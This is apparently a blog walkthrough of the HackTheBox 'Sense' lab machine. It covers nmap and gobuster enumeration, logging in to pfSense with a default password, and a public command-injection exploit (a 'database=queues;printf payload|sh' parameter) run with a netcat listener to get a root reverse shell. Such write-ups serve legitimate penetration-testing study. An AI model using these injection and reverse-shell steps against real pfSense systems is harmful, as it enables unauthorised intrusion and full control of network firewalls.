HackTheBox | Sense

In this walkthrough, I demonstrate how I obtained complete ownership of Sense on HackTheBox
HackTheBox | Sense
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.93 scan initiated Wed Apr  5 16:32:12 2023 as: nmap -Pn -p- --min-rate 10000 -A -oN scan.txt
Nmap scan report for
Host is up (0.014s latency).
Not shown: 65533 filtered tcp ports (no-response)
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_ssl-date: TLS randomness does not represent time
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
1   13.99 ms
2   14.08 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  5 16:32:47 2023 -- 1 IP address (1 host up) scanned in 36.66 seconds

Service Enumeration


Redirects to TCP/443.


The default credential on pfSense installations is admin:pfsense, which did not work for me in this case.

pfSense public exploits, target version unknown

Googling lighttpd 1.4.35 pfsense brought up this Redmine issue.

Bug #5509: lighttpd regression causing config sync failures in some circumstances - pfSense - pfSense bugtracker

Fairly confident this is 2.2.4.

Gobuster Enumeration

gobuster dir -k -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -r -t 100 -o gobuster-443.txt

/index.html           (Status: 200) [Size: 329]
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/stats.php            (Status: 200) [Size: 6690]
/edit.php             (Status: 200) [Size: 6689]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/changelog.txt        (Status: 200) [Size: 271]
/exec.php             (Status: 200) [Size: 6689]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 200) [Size: 7492]
/wizard.php           (Status: 200) [Size: 6691]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 200) [Size: 6113]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/system-users.txt     (Status: 200) [Size: 106]
/services_dyndns.php  (Status: 200) [Size: 6700]

Looks like we found a username, Rohit. Unfortunately, the changelog doesn't disclose a version number, but does confirm the existence of an unpatched vulnerability. I'm not certain if company defaults references the firewall default, so we'll give it a shot:

  1. Rohit:pfsense — Nope
  2. rohit:pfsense — 🎉

Looks like we're in!

Looks like I was way off on my version guess

More Enumeration

I know my way pretty well around pfSense, since I've run it in VMs and on hardware. The web console has a command prompt built into it, but it looks like some of the menus have been disabled for our user.

Based on the version of pfSense on the target, this looks like an excellent candidate for command execution. Let's go through the exploit to understand it further.

searchsploit -m 43560
cat 43560.py

"/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

Looks like the database parameter on the status_rrd_graph_img.php script does not sanitize or validate the database and can be injected with a payload that will be piped to sh on the underlying host.


This version of exploit is very outdated and should be patched promptly to mitigate existing vulnerabilities. Beyond that, the exploit in question does require authentication, which could have been prevented if the user accounts were protected by non-default passwords.

sudo rlwrap nc -lnvp 443

Start a TCP listener

python3 --rhost --lhost --lport 443 --username rohit --password pfsense

Run the exploit

Privilege Escalation

This exploit is executed by a privileged service, yielding a reverse shell as root.




More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.